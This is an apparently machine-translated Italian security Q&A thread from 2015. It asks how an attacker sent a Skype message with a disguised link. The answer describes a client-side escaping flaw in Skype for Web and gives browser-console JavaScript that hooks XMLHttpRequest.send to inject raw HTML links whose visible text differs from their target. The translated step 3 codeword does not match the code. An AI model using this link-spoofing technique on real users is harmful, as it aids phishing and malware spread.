Inserisci link nascosto in Skype [chiuso]

3

Recentemente ho ricevuto un link da uno dei miei contatti Skype (infetto da un virus informatico).

Il link sembra un Instagram, ma punta a un altro sito. Come l'ha attaccato l'aggressore? Come creare un messaggio simile?

Schermata del messaggio Skype (versione 7.7 (335)) su Mac:

Aggiornamento:

Alcune persone pensano che questa domanda non sia correlata alla sicurezza. Ma non sono d'accordo.

Questo è un comportamento insolito di Skype. Gli utenti Skype si aspettano che il testo del link sia sempre uguale al link target. I link modificati possono essere utilizzati per inviare messaggi di spam, distribuzione di malware e de-anonimizzazione degli utenti.

    
posta Yahor 07.07.2015 - 12:43
fonte

1 risposta

10

Attualmente c'è una piccola violazione nel Skype per il Web . Qualsiasi codice HTML è sfuggito sul lato client prima di essere pubblicato sul server Skype. Ma puoi inviare codice HTML senza escape scrivendo codice JavaScript.

I passaggi seguono:

  1. Vai a Skype per il Web tramite Chrome
  2. Apri la console JavaScript ed esegui:

    // replace standard XHR.send() with our custom implementation
    XMLHttpRequest.prototype.oldSend = XMLHttpRequest.prototype.send;
    var newSend = function(args) {
        try {
            // messages to the server are posted via JSON
            // in 'content' field
            var m = JSON.parse(args);
            if (m.content && m.content.indexOf('secret') === 0) { // 'secret' is our codeword
                // if the message begins with 'secret', replace it by our HTML with the link
                m.content = '<a tabindex="-1" target="_blank" href="http://security.stackexchange.com/questions/93305/insert-hidden-link-in-skype">http://watch-yourself.com</a>';
                this.oldSend(JSON.stringify(m));
            } else {
                // if no 'content' field or no 'secret' codeword, then send as is
                this.oldSend(args);
            }
        } catch (x) {
            // if not JSON, then send as is
            this.oldSend(args);
        }
    }
    XMLHttpRequest.prototype.send = newSend;
    
  3. Scrivi "segreto" in qualsiasi messaggio di chat

  4. Il messaggio risultante mostrato nella versione desktop di Skype:

    
risposta data 08.07.2015 - 17:36
fonte

Leggi altre domande sui tag